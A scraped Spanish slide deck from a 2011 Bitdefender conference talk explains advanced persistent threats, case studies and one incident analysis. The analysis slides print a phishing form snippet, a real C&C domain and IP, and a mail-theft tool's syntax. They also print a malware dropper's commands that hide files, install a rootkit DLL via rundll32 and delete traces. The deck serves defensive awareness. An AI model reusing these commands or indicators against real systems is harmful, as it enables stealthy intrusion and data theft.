Charla impartida por Horatiu Bandoiu, de Bitdefender en el evento Asegúr@IT Camp 3, dicho evento tuvo lugar en El Escorial los días 21, 22 y 23 de octubre de 2011.
Diagrama de flujo - ingenieria de sistemas 5to semestre
Adavanced persistant threads
1.
2. ADVANCED PERSISTENT THREATS
“Existen personas más inteligentes que tú, que tienen más recursos que tú,
y que vienen a por tí. Buena suerte.” - Matt Olney (SourceFire)
Horatiu Bandoiu
Pedro Sánchez
3. HORATIU BANDOIU
Whoami
Trabajo:
Marketing – he aprendido hacer Powerpoints
Seguridad – Bitdefender – mas negocio que seguridad en aquellos
tiempos
Seguridad – VAD especializado en seguridad de Rumania
Seguridad – Bitdefender
Experiencia relevante:
Estándares, buenas practicas, sistemas – ISO 27001 & similares
Algunas implantaciones de infraestructuras de seguridad y servicios
profesionales
Interesado de: Psicología forense, steganografia, canales cubiertos,
virtualización, sociología de la era Post PC etc.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 3
4. PEDRO SANCHEZ
Whoami
He trabajado en importantes empresas como consultor especializado en
Computer Forensics, Honeynets, detección de intrusiones, redes trampa y
pen-testing. He implantado normas ISO 27001, CMMI (nivel 5) y diversas
metodologías de seguridad.
Colaboro sobre seguridad y análisis forense informático con diversas
organizaciones comerciales y con las fuerzas de seguridad del estado,
especialmente con el Grupo de Delitos Telemáticos de la Guadia Civil
y la Brigada de Investigación Tecnológica de la policia nacional.
También he participado en las jornadas JWID/CWID organizadas por el
ministerio de defensa, en donde obtuve la certificación nato secret.
Actualmente soy miembro de la Spanish
Honeynet Project y trabajo de consultor
asociado para Bitdefender y Security
Forensics en Google. Soy el autor del blog
conexión Inversa
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 4
5. ¿Que es un APT?
(Advanced Persistent Threat)
• Amenaza: te amenaza, pero hay un grado de intervención humana,
coordinados en el ataque. Los criminales tienen un objetivo específico y
están motivados, organizados y bien financiados.
• Persistentes: los criminales dan prioridad a una tarea específica, en vez de
obtener un beneficio económico inmediato. El ataque se lleva a cabo a
través de un seguimiento e interacción continuos con el fin de alcanzar
los objetivos definidos y que el mismo se mantenga en el tiempo.
• Avanzada: los criminales utilizan tecnologías y técnicas de intrusión
informática avanzadas. Aunque la componente mas usual del ataque es el
malware. Los delincuentes pueden acceder y desarrollar instrumentos más
avanzados cuando sea necesario. Además, se combinan las metodologías de
múltiples ataques y herramientas a fin de alcanzar el objetivo.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 5
6. ¿Como son?
Realidades:
• Los ataques APT pueden romper la seguridad de una empresa aunque
esta haya sido diseñada en seguridad desde el diseño por medio de
muchos vectores:
Infección a través de malware en Internet (Drive-by-Download).
Ingreso de malware físicamente.
Explotación desde el exterior.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 6
7. ¿Como son?
• El abuso de las empresas en el pobre control de cesión de "conexiones de
confianza“ como las VPN's, es un ingrediente clave para muchos APT.
• Los criminales a menudo suplantan las credenciales de los empleados
secuestrados por malware.
• Por lo tanto, cualquier organización o sitio remoto puede ser víctima de un
APT y ser utilizado como un punto de recolección de información. Un
requisito fundamental para APT es permanecer invisible durante todo el
tiempo que sea posible.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 7
8. ¿Quienes son?
(APT vs Hackers)
• Denominados “atacantes”, no hackers. Son profesionales organizados,
muchas veces financiados por estructuras estatales o organizaciones /
empresas con mucho poder
• Su motivación, técnicas y tenacidad son diferentes.
• Aunque su motivación parezca familiar (robar datos), los ataques APT son
diferentes...el TARGET es diferente
• También establecen un medio para volver a la víctima, para robar datos
adicionales y para permanecer ocultos en su red sin ser detectados por la
víctima
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 8
9. Objetivos del APT
Políticos
Económicos
Técnicos
Militares
Los APTs con capaces de comprometer la seguridad de cualquier objetivo
que se fijen. Las medidas de seguridad convencionales son en 95% de
casos inútiles frente a estos ataques.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 9
10. Ciclo de despliegue del APT
1.- Reconocimiento
2.- Intrusión
3.- Implantación, despliegue de herramientas y robo de identidades.
4.- Robo de datos
5.- Mantener la persistencia
6.- (Desaparecer)
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 10
11. 1.- Reconocimiento
Durante la fase de reconocimiento los atacantes identifican a las personas de
interés en la organización.
OBJETIVO: Presidentes, Directores, Directivos, Gerentes, Administradores de
Sistema/ Seguridad (!!!), Ingenieros, hasta secretarias de dirección.
Muchos de estos datos pueden obtenerse directamente de las web públicas. En
otros casos puede obtenerse de los “metadatos” incluidos en documentos Office
y PDF disponibles online o en los buscadores mas utilizados como Google y Bing.
¿Alguien conoce alguna FOCA?
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 11
12. 2.- Intrusión
El mas utilizado es la técnica que combina ingeniería social conjuntamente con el
correo electrónico, llamado “spear phishing”
En este tipo de estafa el ciberdelincuente envía un correo electrónico a los
empleados de una determinada empresa, suplantando la identidad de un directivo
u otro miembro de la misma.
Los adjuntos suelen contener:
Archivo con malware
Archivo Microsoft Office con ejecución selectiva de Macros
Exploit de Adobe Reader, etc.
Cuando no son adjuntos, son enlaces a sitios que plantean el malware (como en el
phishing tradicional). O es el Facebook, LinkedIn, Tuenti …
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 12
13. 3.- Implantación,despliegue y robo
Durante la fase de establecer un acceso remoto por medio de 'conexión inversa‘,
los atacantes intentan obtener las credenciales de administrador del dominio, para
elevar privilegios y moverse por distintas máquinas propiedad de la empresa,
instalando a su vez otras herramientas de 'hacking' o de malware controlado.
El malware utilizado no suele ser detectado por los AV ni sistemas de detección de
intrusos (IDS), y se instala normalmente con privilegios de nivel de sistema.
La acción mas común es intentar conseguir credenciales de administrador local de
la máquina, dado que las políticas de seguridad en muchas empresas suelen ser
relajadas.
Se intentan obtener credenciales de usuario de toda la empresa
Después se realizan sesiones NETBIOS con dichas credenciales para obtener
acceso a las carpetas y ficheros de la red.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 13
14. 3.- Implantación,despliegue
y robo
Se crean usuarios ficticios en los sistemas más fáciles de compromiso como
servidores de bases de datos, de correo y control de aplicaciones.
Se preparan los atacantes e instalan paneles de control para utilidades con objeto
de realizar diferentes tareas de administración:
Instalar más puertas traseras, extraer emails de servidores, listar procesos en
ejecución, extraer ficheros y empaquetarles, establecer canales cubiertos.
En el peor de los escenarios se crean rutas alternativas para salir hacia internet y
se llega a controlar los routers y otros dispositivos de comunicaciones y seguridad
como los cortafuegos.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 14
15. 4.- Robo de datos
El atacante extrae datos como emails, archivos adjuntos y otros ficheros desde
estaciones de trabajo y servidores de ficheros.
La información se comprimen y se protege (p.ej. Archivos RAR segmentados
protegidos con contraseña) en servidores intermedios antes de enviarla a un
servidor que pertenece a la infraestructura de la red atacante (servidores C2, C&C
o Command and Control). También se han visto casos en que se depositan en
grandes contenedores de datos como MEGAUPLOAD y RAPIDSHARE.
Los archivos comprimidos se eliminan de los servidores intermedios en la ultima
fase para no dejar rastro.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 15
16. 5.- Persistencia
En la fase de mantener persistencia el atacante responde a los intentos de
respuesta al incidente de la víctima:
- Estableciendo nuevos puntos de acceso a la red
- Mejorando la sofisticación y actualizar el malware
- Modificando código fuente de aplicaciones legitimas o repositorios donde se
encuentran.
- Borrando log's
- Inhabilitando antivirus o haciendo que estos se comporten de forma anómala
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 16
18. Caso 1: Ataques sobre la Industria
Petrolífera Americana
US oil industry hit by cyberattacks: Was China involved? (Christian Science Monitor)
- Iniciado en 2008
- Spear Phishing a
empleados de nivel C
- 2 años sin ser
observado/respondido
- Tenían medidas de
seguridad de alto nivel
SO WHAT?
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 18
19. CASO 2: CASO AURORA
• Un ataque tipo phishing en Enero 2010 – oops, it
happens again !!!
• La investigación ha revelado no menos de 34 empresas
afectadas, de Google e Yahoo hasta a empresas de
seguridad como Symantec y Juniper, pero también
fabricantes de tecnologias de defensa como Northrop
Grumman.
• Chinese Operation ??? El gobierno chino?
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 19
20. Aurora C&C Communication
- El cargo estaba comunicando con el C&C en el puerto 443
(https).
- El puerto de salida se elige aleatoriamente
- Se estaba usando trafico encriptado
- La estructura del paquete:
- La parte de payload esta encriptada con una llave seleccionada
con GetTickCount – cada nodo infectado tiene su propia llave
- La llave se transmite en el packet header para ser recuperada
facilmente
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 20
21. CASO 3: STUXNET – EL CIBERARMA
La Reina Esther: אֶסְ תר
ֵּ
Todos hablábamos sobre las vulnerabilidades de Industrial
Control Systems
Los vectores de ataque han cambiado:
1. Un USB Stick que contenía un malware increíblemente complejo
2. El payload buscaba su objetivo: (Siemens SIMATIC WinCC/Step 7
Controller software
3. El malware afectaba la interfaz de control y colección de datos de
maquinas a centrifugar Uranio y SE ESCONDIA
4. Se puede actualizar hasta 24 de Junio 2012 (los francmasones??)
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 21
22. CASO 2: DRONES WAR
• Drone = un pequeño dispositivo usado en operaciones
militares, en nuestro caso un avión (UAV) que es
controlado a distancia por un piloto que, lógicamente,
queda resguardado en su base y fuera de todo peligro.
• Creech Aerial Base – keyloggers y comunicaciones
“curiosas” – Le gusta
Mafia Wars?
• Malintencionado o accidente?
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 22
24. Anatomía de un APT
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 24
25. ANATOMIA DE UN CASO DE APT
Como funciona:
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 25
26. ANATOMIA DE UN CASO DE APT
Paso 1. Reconocimiento
Entidad de auditoria financiera
Tiene clientes importantes
Están usando portátiles para analizar y transferir
datos – propios y de clientes
Muy móviles, poca seguridad para los trabajadores
en remoto
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 26
27. ANATOMIA DE UN CASO DE APT
Paso 2. Spear Phishing
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 27
28. ANATOMIA DE UN CASO DE APT
Paso 2. Spear Phishing
form name=3D"1318a6060f9f02b2_mygmail_loginform"
action=3D"http://www.lsbu.ac.uk/php4-
cgiwrap/hscweb/cm/login.php“
method=3D"post" target=3D"_blank"
onsubmit=3D"alert("This form has been disabled.");
return false">{div name=3D"gaia_loginbox">
--------------------------------
input name=3D"AGALX" value=3D"NIE34iN5DAAYY"
type=3D"hidden">=20
input name=3D"myEmail" size=3D"18"
value=3D"xxxxxxxxxxxxxxx@gmail.com"
type=3D"text">{/td>
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 28
29. ANATOMIA DE UN CASO DE APT
Paso 3. El malware
- Dirección de correo fake en Gmail
- Llegamos al “bicho”
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 29
30. ANATOMIA DE UN CASO DE APT
Paso 3. El malware
- Ejecutamos el bicho en maquina virtual y le damos
tiempo para manifestarse
- El fichero docx da un error clásico de Runtime
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 30
31. ANATOMIA DE UN CASO DE APT
Paso 3. El malware
- Mientras tanto, sorpresa:
- se ha lanzado un proceso “file.exe” y
- se ha creado en los temporales un html en la ruta
C:Documents and SettingsKLYLocal SettingsTempmhzksbnz.html)
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 31
32. ANATOMIA DE UN CASO DE APT
Paso 3. El malware
El malware
registra los inputs
del teclado
Keylogger
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 32
33. ANATOMIA DE UN CASO DE APT
Paso 3. El malware
El proceso 'file.exe' crea también un fichero 'UpdaterInfo.dat‘
+ diversas librerías .dll y otros diversos ficheros 'html'.
(se esta preparando para el siguiente paso)
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 33
34. ANATOMIA DE UN CASO DE APT
Paso 4. Comunicamos ?
El proceso lanza una conexión a Internet y por HTTP se conecta al siguiente
dominio 'tomitomi.cn - 195.248.234.157' (registrado a nombre de Zhejiang 5
Red Interior – una empresa de diseño grafico) y procede a la descarga de un
fichero comprimido de nombre 'gamer.zip‘
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 34
35. ANATOMIA DE UN CASO DE APT
Paso 5. Silencio! Estamos trabajando!
• El fichero se almacena en la carpeta 'temp' y contiene los
siguientes ficheros:
– iam.exe
– iam.dll
– m.exe
– r.exe
– y.exe
– sas.bat
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 35
36. ANATOMIA DE UN CASO DE APT
Paso 5. Silencio! Estamos trabajando!
• El fichero m.exe es una variación de 'getmail' y sirve para
recuperar mensajes de correo electrónico de servidores
Exchange
Ejemplo:
%s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -
o:c:winnttemp
%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath
•
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 36
37. ANATOMIA DE UN CASO DE APT
Paso 5. Silencio! Estamos trabajando!
• El fichero r.exe es el rar.exe de Winrar y sirve probablemente
para la compresion de los datos robados
• El rootkit y.exe crea el fichero
'C:WINDOWSsystem32prxy.dll' y un archivo por lotes de
nombre 'sas.bat'
• A continuación se crea un proceso basando en 'cmd.exe' con
el siguiente comando 'cmd /c rundll32 prxy.dll,RundllInstall' y
con los posteriores comandos:
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 37
38. cmd /c attrib +h +s prxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 prxy.dll,RundllInstall
prxy.dll
cmd /c sas.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del sas.bat
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 38
39. PRXY.DLL
Creado por 'Y.EXE' reemplaza el servicio legitimo BITs de
Windows ubicado en la siguiente rama del registro:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServi
cesBITSParameters
Facilita la descarga de software sin que la mayoría de los
antivirus o cortafuegos hagan algo al respecto, dado que
al tratarse de un servicio legitimo se permiten la entrada y
salida de trafico hacia Internet.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 39
40. SAS.BAT
Como su nombre indica es un fichero de proceso por lotes y
quizás este es el mas sorprendente de los ficheros analizados
por el contenido:
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 40
41. Si descomprimimos el archivo ~WRD0100.tmp nos
encontramos con lo siguiente:
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 41
42. CONCLUSION ?
• Aun estamos investigando pero
parece que alguien se prepara para
hacer una grande implantación en la
consultora y sus clientes. O lo ha
hecho ya?
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 42
43. Conclusiones APT
APT no es un problema exclusivo de otros ni de estado, militar o de ciertas
industrias. Todos somos susceptibles de ser atacados
No existe un objetivo pequeño, ni poco defendido. Interesa ya no lo
económico, pero lo interesante y privado
El enemigo es capaz de evadir antivirus, IDS y los equipos de respuesta a
incidentes no están debidamente equipados.
De todo el malware analizado en casos conocido de APT, sólo el 24% fue
detectado por software antimalware.
Evitan la detección utilizando puertos TCP/IP comunes, inyección en
procesos comunes, y persistencia mediante servicios de Windows. También
se instala en modo privilegiado (si lo puede conseguir).
Sólo inician conexiones “salientes”, casi nunca se inician en modo “escucha”
de conexiones entrantes.
En sistemas virtualizados o en el cloud muchas veces la seguridad se relega
a mecanismos tradicionales y esto no es suficiente
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 43
44. Conclusiones APT
¿Como arreglo esto?
Debes ser capaz de ver y buscar signos de intrusiones más allá del antivirus y
del IDS:
Empieza a utilizar la palabra, concientizar los usuarios e implantar
mecanismos de 'Monitorizar', por lo tanto:
Información a nivel de RED
Información a nivel de HOST
Procesos
SIEM?
Debes mirar examinar el contenido del tráfico de red, ficheros, correos e
incluso la memoria RAM de los sistemas, ¿Cuanto hace que no revisas los
procesos de tu granja virtualizada?
Empieza a distinguir entre OK y NOK o falso positivo o falso negativo. No
delegues esta función, hazlo tú.
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 44
46. Conclusiones APT
¿Como arreglo esto?
No peleamos contra máquinas ni código, lo hacemos contra inteligencia
humana y de buena calidad
Necesitamos herramientas que se integren con la forma de pensar, los
métodos y las habilidades de los responsables de defender a las
organizaciones, es decir una nueva figura como los analistas de seguridad.
Necesitamos saber lo que queremos proteger y protegerlo adecuadamente.
Los AV tradicionales no sirven. Que tal de nuevas tecnologías?
THINK DIFFERENTLY !!!
No puedes protegerlo todo, protege lo que tiene mas valor
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 46
47. Conclusiones APT
Seguridad en la era PostPC
Usamos cada día mas y más dispositivos nuevos que no tienen seguridad
por diseño
Hacemos mas y mas las cosas “en la nube”
Nos movemos mucho, junto con nuestros “boxes”
Estamos virtualizando casi todo
Pero las cosas básicas de seguridad no han cambiado.
ADAPT! STAY AWARE!
Copyright@bitdefender 2011 / www.bitdefender.es 10/27/2011 • 47